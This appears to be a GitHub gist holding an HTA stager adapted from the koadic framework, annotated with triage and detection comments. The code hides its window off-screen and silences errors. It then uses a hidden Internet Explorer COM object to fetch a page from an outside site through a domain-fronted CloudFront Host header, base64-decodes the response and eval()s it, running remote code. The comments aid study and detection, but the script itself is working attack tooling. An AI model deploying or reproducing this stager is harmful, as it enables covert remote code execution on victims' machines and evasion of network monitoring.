@leoloobeek
Last active July 24, 2023 00:39
HTA example for
<html>
<head>
<script language="JScript">
// HTA skeleton taken from https://github.com/zerosum0x0/koadic
// Window-hiding preamble: every statement in this block keeps the HTA window out
// of the user's sight. For triage, an HTA that shrinks itself to 1x1 and moves
// off-screen before doing anything else is a strong signal that it is not a
// legitimate user-facing application.
window.resizeTo(1, 1);
// Moves the window to (-2000, -2000), i.e. up and left of the primary screen's origin.
window.moveTo(-2000, -2000);
window.blur();
try
{
// Give focus away again whenever the window receives it.
window.onfocus = function() { window.blur(); }
// Replace the error handler with one that ignores its arguments and always returns false.
// NOTE(review): presumably meant to keep script-error dialogs from appearing - confirm
// which return value actually suppresses the dialog under mshta.
window.onerror = function(sMsg, sUrl, sLine) { return false; }
}
// Empty catch: a failure to install either handler is silently ignored.
catch (e){}
</script>
<script language="JScript">
// decodeBase64(base64): returns the base64-decoded input as a string.
//   base64 - base64 text; in this file the caller passes the innerHTML of the fetched page.
// Implementation: an XML DOM element typed "bin.base64" performs the decoding, and a
// System.Text.ASCIIEncoding object created through ActiveXObject turns the bytes into a string.
// Detection note: creating System.Text.* through ActiveXObject typically pulls the .NET
// runtime into the script host, which is unusual for mshta.exe - verify against your own
// telemetry before alerting on it.
function decodeBase64(base64) {
var dm = new ActiveXObject("Microsoft.XMLDOM");
var el = dm.createElement("tmp");
// With dataType set to bin.base64, nodeTypedValue yields the decoded bytes of el.text.
el.dataType = "bin.base64";
el.text = base64;
var b64bytes = el.nodeTypedValue;
// ASCII decoding: bytes above 0x7F are not expected to survive intact - NOTE(review): confirm.
var asc = new ActiveXObject("System.Text.ASCIIEncoding");
return asc.GetString(b64bytes);
}
// Stager sequence: fetch a page through an Internet Explorer COM instance,
// base64-decode its body, eval() the result, then close the HTA.
// NOTE(review): with InternetExplorer.Application the HTTP request is presumably issued
// by an IE process rather than by the HTA host, so network telemetry may attribute the
// connection to the browser - correlate with the script host that automated it.
var ie_com = new ActiveXObject("InternetExplorer.Application");
// Silent and not Visible: no dialogs and no browser window for the user to notice.
ie_com.Silent = true;
ie_com.Visible = false;
// The Host header names a CloudFront host while the URL below names a different site
// (the pattern usually called domain fronting). The URL is plain http://, so the mismatch
// between the requested site and the Host header is visible to any proxy that inspects
// the request; comparing the two is a practical detection for this traffic.
var headers = "Host: <SNIP>.cloudfront.net\r\n";
// Flags 14 = 0x2|0x4|0x8, which in BrowserNavConstants are navNoHistory, navNoReadFromCache
// and navNoWriteToCache; the remaining arguments are target frame (0), POST data (null)
// and the extra headers.
ie_com.Navigate2("http://www.irs.com/", 14, 0, null, headers);
// Poll until the navigation is no longer busy. A new WScript.Shell object is created on
// every iteration, and each iteration starts a hidden ping (window style 0) and waits
// for it to finish (third argument true), which serves as the delay.
// Detection note: the script host repeatedly spawning ping against 127.0.0.1 is a
// process-creation pattern worth flagging.
while(ie_com.Busy) {
var shell = new ActiveXObject("WScript.Shell");
// WScript.Sleep will not work from an HTA
shell.Run("ping 127.0.0.1 -n 1", 0, true);
}
// The response is read as the rendered body's HTML, not as raw bytes.
var resp = ie_com.document.body.innerHTML
ie_com.Quit();
// decoded is assigned without var, so it becomes an implicit global.
decoded = decodeBase64(resp);
// SECURITY: eval() runs whatever text the remote server returned, inside an HTA that can
// create arbitrary ActiveX objects (as the code above does). Nothing here checks the
// origin or integrity of that content, so this line is remote code execution by design.
eval(decoded);
// Both calls close the HTA window once the evaluated code returns.
window.close();
self.close();
</script>
<hta:application caption="no" showInTaskBar="no" windowState="minimize"
navigable="no" scroll="no" />
<!-- -->
</head>
<body>
</body>
</html>